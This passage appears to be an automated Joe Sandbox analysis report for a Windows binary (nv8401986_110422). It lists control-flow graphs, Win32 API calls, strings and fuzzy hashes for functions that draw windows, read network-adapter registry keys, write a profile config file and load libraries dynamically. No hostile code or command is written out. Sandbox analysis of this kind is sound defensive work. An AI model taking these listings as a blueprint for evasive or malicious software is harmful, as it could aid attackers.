                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 2476 4996e0-499728 call 401570 * 4 2485 49972e-499733 2476->2485 2486 499aa5-499ab4 call 513805 2476->2486 2488 499743-4997bd GetClientRect call 4a12f0 call 4a13e0 call 4a1e10 SelectObject call 403500 2485->2488 2489 499735-49973c DeleteObject 2485->2489 2501 499930-499935 2488->2501 2502 4997c3-4997d6 call 4a3dc0 2488->2502 2489->2488 2503 49993b-499946 IsWindow 2501->2503 2504 499a64-499a84 call 4a12f0 call 4a13e0 2501->2504 2509 49991b-499924 2502->2509 2510 4997dc 2502->2510 2503->2504 2506 49994c-49995c 2503->2506 2521 499a90-499aa4 SelectObject DeleteDC 2504->2521 2506->2504 2518 499962-4999c0 GetWindowRect call 4a13e0 call 4a12f0 2506->2518 2509->2502 2513 49992a 2509->2513 2512 4997e0-4997ee call 4a3e30 2510->2512 2522 499908-499915 2512->2522 2523 4997f4-4997fc call 49dd00 2512->2523 2513->2501 2530 4999e9-4999ec HideCaret 2518->2530 2531 4999c2-4999c7 IsWindow 2518->2531 2521->2486 2522->2509 2522->2512 2523->2522 2529 499802-49980a call 49dd60 2523->2529 2529->2522 2540 499810-499835 call 4a13c0 call 49dc10 call 401570 call 49dd00 2529->2540 2533 4999f2-499a27 UpdateLayeredWindow 2530->2533 2531->2530 2532 4999c9-4999d9 2531->2532 2532->2530 2541 4999db-4999e7 KillTimer 2532->2541 2535 499a59-499a62 ShowCaret 2533->2535 2536 499a29-499a2e IsWindow 2533->2536 2535->2521 2536->2535 2539 499a30-499a40 2536->2539 2539->2535 2545 499a42-499a57 GetCaretBlinkTime SetTimer 2539->2545 2540->2522 2552 49983b-499851 call 4a1230 call 4a13e0 2540->2552 2541->2533 2545->2521 2557 499863-4998cb call 401570 call 49dbd0 CreateRectRgn SelectClipRgn SetViewportOrgEx 2552->2557 2558 499853-49985d call 4a12f0 2552->2558 2565 4998d2-499902 SetViewportOrgEx SelectClipRgn DeleteObject 2557->2565 2558->2522 2558->2557 2565->2522
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00499736
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0049974B
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0049979E
                                                                                                                                                                                                          • CreateRectRgn.GDI32(?,?,?,?), ref: 00499881
                                                                                                                                                                                                          • SelectClipRgn.GDI32(?,00000000), ref: 004998A4
                                                                                                                                                                                                          • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004998BD
                                                                                                                                                                                                          • SetViewportOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004998EC
                                                                                                                                                                                                          • SelectClipRgn.GDI32(?,00000000), ref: 004998F5
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004998FC
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00499942
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00499969
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 004999C3
                                                                                                                                                                                                          • KillTimer.USER32(?,?,?,75A92370,00000000), ref: 004999E1
                                                                                                                                                                                                          • HideCaret.USER32(?), ref: 004999EC
                                                                                                                                                                                                          • UpdateLayeredWindow.USER32(?,?,?,?,00000000,00000000,00000000,01FF0000,00000002), ref: 00499A1C
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00499A2A
                                                                                                                                                                                                          • GetCaretBlinkTime.USER32(00000000,?,75A92370,00000000), ref: 00499A44
                                                                                                                                                                                                          • SetTimer.USER32(?,?,00000000), ref: 00499A51
                                                                                                                                                                                                          • ShowCaret.USER32(?), ref: 00499A5C
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00499A97
                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00499A9E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$ObjectSelect$CaretDeleteRect$ClipTimerViewport$BlinkClientCreateHideKillLayeredShowTimeUpdate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 793400785-0
                                                                                                                                                                                                          • Opcode ID: 97107376e8f533a1afee41e3162c9107674a22122ee761a397bfe97a5f7dae0c
                                                                                                                                                                                                          • Instruction ID: dd10437a4ec9ca5634d3f4d2c0e82f3ba4c1eb554d4f6e2bbd6ba775d0c32502
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97107376e8f533a1afee41e3162c9107674a22122ee761a397bfe97a5f7dae0c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51B16E75900218AFDF20DFA5CD45FEEBBB9AF15304F0000A9F50AA21A1DB34AE49DF64
                                                                                                                                                                                                          Function 0048FF50 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 205libraryloaderregistryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 2566 48ff50-48ffb5 call 415dc0 2569 48ffdc-48fffb RegOpenKeyExA 2566->2569 2570 48ffb7-48ffd9 GetProcAddress 2566->2570 2571 49024b-49025d call 513805 2569->2571 2572 490001-49003a call 4244b0 call 415dc0 2569->2572 2570->2569 2579 49003c-49005e GetProcAddress 2572->2579 2580 490061-490083 RegOpenKeyExA 2572->2580 2579->2580 2581 490089-4900b5 call 415dc0 2580->2581 2582 490207-49021f call 415dc0 2580->2582 2589 4900d0-4900f9 RegQueryValueExA 2581->2589 2590 4900b7-4900cd GetProcAddress 2581->2590 2587 490221-49023d GetProcAddress 2582->2587 2588 490240-490246 2582->2588 2587->2588 2588->2571 2591 4900ff-490157 call 5165e0 call 415dc0 call 46bac0 2589->2591 2592 4901c3-4901db call 415dc0 2589->2592 2590->2589 2591->2592 2603 490159-490162 2591->2603 2598 4901dd-4901f9 GetProcAddress 2592->2598 2599 4901fc-490205 RegCloseKey 2592->2599 2598->2599 2599->2582 2604 4901b4-4901bc 2603->2604 2605 490164-49017c call 52bb40 2603->2605 2604->2592 2608 49017e-490180 2605->2608 2609 490182-49018b 2605->2609 2608->2592 2609->2604 2610 49018d-4901a5 call 52bb40 2609->2610 2613 4901ae 2610->2613 2614 4901a7-4901ac 2610->2614 2613->2604 2614->2592
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048FFD7
                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318},00000000,00020019,00000000,?,00000000), ref: 0048FFF7
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0049005C
                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,00000000), ref: 0049007F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004900CB
                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,MediaSubType,00000000,00000004,00000000,00000004), ref: 004900F5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004901F7
                                                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 00490205
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0049023B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$Open$CloseEnterInit_thread_footerInitializeLeaveQueryValue
                                                                                                                                                                                                          • String ID: %s\Connection$Key$MediaSubType$PCI$PnpInstanceID$RegC$RegO$System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}$lose
                                                                                                                                                                                                          • API String ID: 1220120693-1602475108
                                                                                                                                                                                                          • Opcode ID: 5fa2da8577e4b1ab779ed0a0afea5a12b975507f685e46f4d0d40af66012d746
                                                                                                                                                                                                          • Instruction ID: 66da33d3f6c143058e4c25fcf34c8e9f009c8e153576b8512393f1f7a8799eef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fa2da8577e4b1ab779ed0a0afea5a12b975507f685e46f4d0d40af66012d746
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7810AB09002199FDB20DF65DD86BDEBBF8BF08304F4045A9E549E6241EB74AB94CF94
                                                                                                                                                                                                          Function 0049F9C0 Relevance: 25.0, APIs: 4, Strings: 10, Instructions: 527COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: GlobalSize$Window_wcsrchr
                                                                                                                                                                                                          • String ID: CollectGarbage();$DirectUI.js$config.xml$directui$ducontrol$duwindow$name$resManager$theme$winManager
                                                                                                                                                                                                          • API String ID: 1149426230-2029015323
                                                                                                                                                                                                          • Opcode ID: 072d02c2918d1fe43110286889bc25812681e4530c93af0beb96ce42ce721cb6
                                                                                                                                                                                                          • Instruction ID: 87e1b301245808ad0760709a805c9936a8d763eab8b64b3ce337e060a2ad52e3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 072d02c2918d1fe43110286889bc25812681e4530c93af0beb96ce42ce721cb6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F112A3B1A00205ABDF24DF64C855BEEBBB8BF49314F44417EE509E7281EB74AE44CB58
                                                                                                                                                                                                          Function 0048D3A0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 325fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,EFE0703F,00000000,00000000), ref: 0048D407
                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(?), ref: 0048D413
                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,?), ref: 0048D425
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 0048D44B
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0048D46D
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048D825
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0048D837
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseHandle$CreatePointerSizeWrite
                                                                                                                                                                                                          • String ID: %02x$[Profile]$config1$config2$config3$config4$config5
                                                                                                                                                                                                          • API String ID: 723050636-2983988086
                                                                                                                                                                                                          • Opcode ID: 5348974cc467094eba23520932fcfbe9b9d6d008d263bc6e40c42bf4397ceca7
                                                                                                                                                                                                          • Instruction ID: 68861774f9ae05e4148281d3363de4f193ef476ba505d0949c7b9316a25c96b1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5348974cc467094eba23520932fcfbe9b9d6d008d263bc6e40c42bf4397ceca7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5D1A670D05248DEEB10D764D946BDDBBB0AF25308F1481ADE849732C3EB746B08DB66
                                                                                                                                                                                                          Function 004A0890 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 308COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 004A0903
                                                                                                                                                                                                          • GlobalSize.KERNEL32(00000000), ref: 004A0A53
                                                                                                                                                                                                          • 73A0A570.USER32(00000000,00000000,004A0160,00000000,00000000,?,theme,directui), ref: 004A0B0A
                                                                                                                                                                                                          • EnumFontsW.GDI32(00000000), ref: 004A0B11
                                                                                                                                                                                                          • GlobalSize.KERNEL32(00000000), ref: 004A0C02
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                            • Part of subcall function 0046CE40: GetProcAddress.KERNEL32(?,?), ref: 0046CE79
                                                                                                                                                                                                            • Part of subcall function 004CD160: RtlEnterCriticalSection.NTDLL(005980A4), ref: 004CD1DC
                                                                                                                                                                                                            • Part of subcall function 004CD160: RtlLeaveCriticalSection.NTDLL(005980A4), ref: 004CD22A
                                                                                                                                                                                                            • Part of subcall function 004CD160: CoCreateInstance.COMBASE(00000000,00000000,00000017,00564AB0,00000000), ref: 004CD253
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterGlobalLeaveSize$A570AddressCreateEnumFontsInit_thread_footerInitializeInstanceProc_wcsrchr
                                                                                                                                                                                                          • String ID: CollectGarbage();$DirectUI.js$config.xml$directui$resManager$theme$winManager
                                                                                                                                                                                                          • API String ID: 3226567190-724004937
                                                                                                                                                                                                          • Opcode ID: ad7d919d22f53e32f66c48d252bedbd18532f11725e4def1f9929a6088f255bb
                                                                                                                                                                                                          • Instruction ID: 21ccf36060daee3d55d043c68d4f806dba8e99775befe815b9ec61268d8b935d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad7d919d22f53e32f66c48d252bedbd18532f11725e4def1f9929a6088f255bb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02C1A575A40215AFEB14EFA0CC9DFEAB7B8BF59300F10059AF50997281EB74A944CF94
                                                                                                                                                                                                          Function 0041B580 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 194filesynchronizationwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlInitializeCriticalSection.NTDLL(00597D08), ref: 0041BFCE
                                                                                                                                                                                                            • Part of subcall function 0041BF60: __Init_thread_footer.LIBCMT ref: 0041BFEA
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlEnterCriticalSection.NTDLL(00597D08), ref: 0041C005
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlLeaveCriticalSection.NTDLL(00597D08), ref: 0041C115
                                                                                                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000000,?,00000000,?), ref: 0041B674
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041B6E0
                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000400,00000000,?), ref: 0041B71E
                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 0041B78C
                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 0041B796
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000007E8,00000000,00000000), ref: 0041B7AB
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000001), ref: 0041B7B9
                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0041B7C1
                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041B7C8
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041B7CF
                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 0041B7DB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalFileSectionWindow$CloseCreateHandleView$EnterErrorForegroundInit_thread_footerInitializeLastLeaveMappingMessageMutexSendShowUnmap
                                                                                                                                                                                                          • String ID: ATL:MemData03EA
                                                                                                                                                                                                          • API String ID: 2049962414-709304236
                                                                                                                                                                                                          • Opcode ID: 1f234b4b6f5a76aeb3b19fd0fb72c9a2173e7b886c40ecf5e61edd3b3c9bc17c
                                                                                                                                                                                                          • Instruction ID: 8c234a87740ad5e44fa06b2b6c16da18d7a94b08daf6779525c0ac8bc8160d1f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f234b4b6f5a76aeb3b19fd0fb72c9a2173e7b886c40ecf5e61edd3b3c9bc17c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B471E271A00208EBEB14DFA8DD89BDEBBB1FF85714F204519F510A72E0D7789A848B94
                                                                                                                                                                                                          Function 00497640 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetPropW.USER32(?,SYSPLUGIN), ref: 004976A1
                                                                                                                                                                                                          • RemovePropW.USER32(?,SYSPLUGIN), ref: 0049770C
                                                                                                                                                                                                          • GetClassLongW.USER32(?,000000E6), ref: 0049772B
                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000E6,00000000), ref: 00497738
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000237), ref: 004977B0
                                                                                                                                                                                                            • Part of subcall function 004A2A00: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A2A47
                                                                                                                                                                                                            • Part of subcall function 004A2A00: SetWindowPos.USER32(?,00000000,?,?,00000000,?,00000214,75A92370,00000000,00000000), ref: 004A2AB9
                                                                                                                                                                                                            • Part of subcall function 004992F0: IsWindow.USER32(?), ref: 004992FB
                                                                                                                                                                                                          • 73A0A570.USER32(?), ref: 004977C8
                                                                                                                                                                                                            • Part of subcall function 004996E0: DeleteObject.GDI32(?), ref: 00499736
                                                                                                                                                                                                            • Part of subcall function 004996E0: GetClientRect.USER32(?,?), ref: 0049974B
                                                                                                                                                                                                            • Part of subcall function 004996E0: SelectObject.GDI32(00000000,00000000), ref: 0049979E
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 004977E6
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,tooltips_class32,00571978,80000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0049780B
                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 00497823
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$ClassLongObjectProp$A570ClientCreateDeleteHandleInfoModuleParametersRectRemoveSelectSystem
                                                                                                                                                                                                          • String ID: SYSPLUGIN$tooltips_class32
                                                                                                                                                                                                          • API String ID: 2739756791-1711320849
                                                                                                                                                                                                          • Opcode ID: c92ddd6769d7665c02f2c9d002a0e3fc505f1d64b5d2ff7c897796eeb7d4fd81
                                                                                                                                                                                                          • Instruction ID: fba20f7986df18ab2ce0285e8c17044c9a2b9f366ebf99f742542b02dfec179f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c92ddd6769d7665c02f2c9d002a0e3fc505f1d64b5d2ff7c897796eeb7d4fd81
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B951C331644204BBDF10AF68CC45F5B7FA8EF56764F10426AF915EB2E1CB78E9008BA4
                                                                                                                                                                                                          Function 004F3190 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 141libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,75920E50,00000002,004D80FF), ref: 004F319E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 004F31B8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                                                                                                                                                                                          • API String ID: 1646373207-3327535076
                                                                                                                                                                                                          • Opcode ID: 8bc75b4a7cfa62d7bfb5fa97cd9b3d04a01ea3466b8b4b09afe4742b6252688f
                                                                                                                                                                                                          • Instruction ID: d0f0a0077bccb34425ef9b4ac95bebf668861f8af76a6435c59df848463201ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bc75b4a7cfa62d7bfb5fa97cd9b3d04a01ea3466b8b4b09afe4742b6252688f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA415B35300305ABEF104F68AC487BBBB68EF56316F1440BBED05D7352EA768A0A8354
                                                                                                                                                                                                          Function 0046DC70 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,EFE0703F,00000000,007F9738), ref: 0046DCE4
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0046DD1B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046DD40
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046DD5E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
